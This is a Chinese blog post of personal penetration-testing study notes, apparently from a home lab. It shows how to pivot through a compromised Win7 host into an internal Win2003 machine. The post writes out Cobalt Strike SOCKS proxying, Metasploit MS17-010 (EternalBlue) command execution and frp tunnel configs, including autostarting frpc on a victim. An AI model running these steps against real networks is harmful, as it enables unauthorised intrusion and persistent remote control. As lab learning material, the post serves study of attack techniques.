安全学习记录——渗透篇（四）第一个内网设备

我们之前能简单控制第一台设备了，尽管没用完全控制，毕竟没有远程操控到桌面。那么今天我们要做的就是通过这台我们已经控制的设备，进而控制内部的设备。

还是老场景，我们作为海王，只是追到一个怎么够呢，要通过这个发展下线呀。不知道大家有没有看环球网发的拜登的发言，他建议年轻男人找对象最好找有五个女儿的家庭，因为总有一个小姨子和他站在一起。。。不知道这个逻辑是怎么来的，但是，我们想要控制一个域，确实是需要通过对外的设备去连接内部设备，只要有一个对外开放的，总有办法渗透进去。

首先第一步，我们是不可能直接接触到对象的家人的，所有的接触都需要对方在场或者通过对方，否则，家人有极大概率根本不理我们。同理，我们需要做的其实就是将控制的第一台设备变成一个代理，有这个代理来转发我们的请求。我不会写代理程序，所以只能借助工具，这里使用的是CS自带的SOCKS通道，当然还有frpc，这里先简单说一下这两个的原理。

SOCKS

SOCK其实就是socket的简写，通过中间的代理服务器创建了一个转发通道，中间这台机器接收了kali传来的数据包后再自己把完整的数据转发给预设的目的IP，如果这目的IP它自己能ping通的话，那就多半可以转发成功。之所以是多半，是因为我们不知道边界防护状态，我们只是通过了这个机器的路由表来看哪些设备和我们不同网段，猜测这些可能是内网机器，然后ping探测看看是否活跃，活跃的话就开始搞。

那么什么是socket呢，这是一个应用层协议，具体通信步骤如下：

• kali和win7通过tcp握手建立连接
• kali和win7发起协商，互相告知支持的认证方式
• kali发起请求，告知目标地址；win7根据目标地址寻找对方获得响应后自己响应kali的请求
• kali发送数据，win7转发数据给win2003，win2003响应，win7响应

从这里我们可以看出，一切可以转发数据的协议都可以被用来制作代理服务器，所以代理并不是什么高级玩意，我们的邮件转发SMTP/POP3，文件转发FTP等都算是代理。选择SOCKS的原因是这个协议会完整地转发我们的一切数据包，至于对方是否接受，那就不是代理的问题了。

操作很简单，前面我们不是已经让win7上线CS了嘛，首先我们要找到对方有什么机器，通过路由表来找看到这里，有两个网段，第一个当中就有我们kali的地址，其中第二个是我们的回环地址，通过在CS中输入shell ipconfig得到，这个没什么用，所以第三个234多半就是内网机器，因为它在本地连接里面。

然后我们通过CS来在win7上创建SOCKS服务

之后我们进入到kali中开始使用msf进行渗透。

> msfconsole
> setg Proxies socks4:192.168.52.128:4027 #这是CS服务器，也就是kali地址

然后就是msf的老流程

search ms17-010 #找到永恒之蓝的payload
use auxiliary/admin/mssql/mssql_escalate_execute_as #扫描一下看看有没有

use auxiliary/admin/smb/ms17_010_command #只能用这个，前面两个我都没成功

show options #查看需要些什么设定，这里需要一个rhosts和一个command

set RHOSTS 192.168.234.141 #目标是wun2003
set command whoami #看查看用户是否可以执行
run #开始攻击

然后我们就成功了，接下来我们不断重设command，随意进行修改即可，比如打开3389来搞远程桌面，或者通过win7传入一个木马来上线内部机器到其它地方。需要注意的是我们首先还是要收集一下内网信息，比如通过msf扫描一下漏洞。需要注意的是，尽管上面图中我写了一个win11可以连通所有设备，好像一个公网服务器一样，但是实际上公网服务器没办法连接到内网设备，因为NAT的存在，只能内网主动连接公网，就算我们把kali放公网上也没办法访问到win2003的，所以我们才需要一个win7这样能主动连接win2003的中间设备来作代理。

FRP

frp的原理其实和SOCKS是一样的，它需要我们给服务器配置frps和内网机器配置frpc并且双方连接成功后才能使用。前提条件仍然是这两个机器本身就能连通。想要成功仍然需要上传frpc及其配置文件到对方设备上并且设置开机自启动才能保证不会断连，这个并不是病毒，所以也不会被查杀，总之我电脑上不会被查杀。这里我想展示的是frp的一个有意思的用法，让我们远程用手机来使用我们kali上的各种工具。任何内网代理工具都能做到这点，并只有frp。

首先我们需要将frps和frps.toml放在服务器上面，然后修改toml文件中的配置，这里我们使用的win11模拟公网服务器。然后启动它，出现下图的样子表示成功。具体其它配置可以参考这个：概览 | frp (gofrp.org)，frp还可以使用http、udp等连接内网设备。

toml
bindPort = 7000

启动
.\frps.exe -c frps.toml

然后我们在kali上创建frp文件将frpc和frpc.toml放进去，之后修改toml文件，用同样的方式启动它，或者我们可以把它添加进systemctl中这样启动起来方便一点。成功之后就如下图所示

serverAddr = "192.168.20.120" #这是win11的ipv4地址
serverPort = 7000

[[proxies]]
name = "ssh"
type = "tcp"
localIP = "127.0.0.1"
localPort = 22
remotePort = 6000

启动
./frpc -c ./frpc.toml

在然后我们在手机上打开ssh的app，比如我是iphone，这里我就使用Termius，因为直接控制台连接的方式是这样，x.x.x.x表示的是服务器的ip，6000表示的是服务器转发的端口。

ssh -o Port=6000 test@x.x.x.x

然后我们打开手机上的app设置ssh。连接时输入用户和密码就行，成功之后如下图所示

然后我们就可以快乐地使用手机来使用kali了，比如使用msf，和之前的步骤完全一样。nmap扫面出445，然后msf用永恒之蓝打进去。

而如果说我们传入的frpc是在对方的内网机器上，那么我们也可以使用同样的方式去控制对方的机器。之所以要介绍frp是因为它的作用并不只是限定在内网穿透上，它可以让我们仅仅通过一台手机就实现多台设备的控制，无论是别人的还是我们自己的，不用再限定在笨重的电脑面前，只要有一个公网服务器就行。也可用来搭自己的网站，保证源码和边界服务器分离，仅开放对应服务端口，好像还比较安全？就是速度可能比较感人。但用来存照片视频什么的也够了，跟网盘差不多，还可以自己扩容以及家人共享。等我有空了实验下，找个比较划算和安全的方法。

总结

那么从上面的两种穿透方法可以看出来，无论如何我们都需要一个跳板来帮助连接内网，这个跳板最好是一个公网的服务器。尽管我将CS服务器放在了kali上，但是CS制造的木马能在win7上生效的原因也是win7和kali本来就是相通的，必须要win7能连上kali，win7才可以在我们win11的设备里上线，win7能否连上win11并不是必要条件。我们制造的SOCKS同样需要win7能主动连通win2003才可以成为代理转发通道。frp同理，kali不能ping通我的手机，但是因为电脑可以通过WiFi连通手机，所以手机和kali可以借用电脑转发来互相连通。这是第一点，穿透必须要一个边界设备作跳板。第二，穿透必须要让内网机器主动出网，除非它能够被边界设备直接连上。SOCKS其实就是因为边界设备能直接连上对方内部设备才可以成功，但是这个世界上绝大多数的网络架构不会这么设计的，因为这太不安全，一般都会有好几层防护，只允许内部连接外部。我们常说：男追女隔座山，女追男隔层纱；因为一般印象中女生更加容易受到伤害，所以会受到更多特别的保护，男生想要接近女生会被各种拷打考验。但是一般没谁会特地保护男生的，排除特种职业，男生所享有的权力至少在法律和各种书面规则上讲全人类通用，所以女生追男生会相当容易。网络也是一样，一个外面的设备想渗透内部会很困难，但是内网设备却很容易就能连上外面。当然防护中专门强调过需要注意防范非授权的内部连接外部行为，但是，内网也得上网吧，因此社工钓鱼仍然是最常用的渗透方式。

后面还有内网提权，横向等域渗透内容，因为基础不怎么扎实，经验也不怎么足，还得学点其它东西所以暂时不接着往后面搞了。等我把知识面弄宽了后再来深挖，不然只是会用工具那有什么意思。就比如提权就涉及到汇编，那我可完全不会。先搞些更基础的东西，比如学学汇编。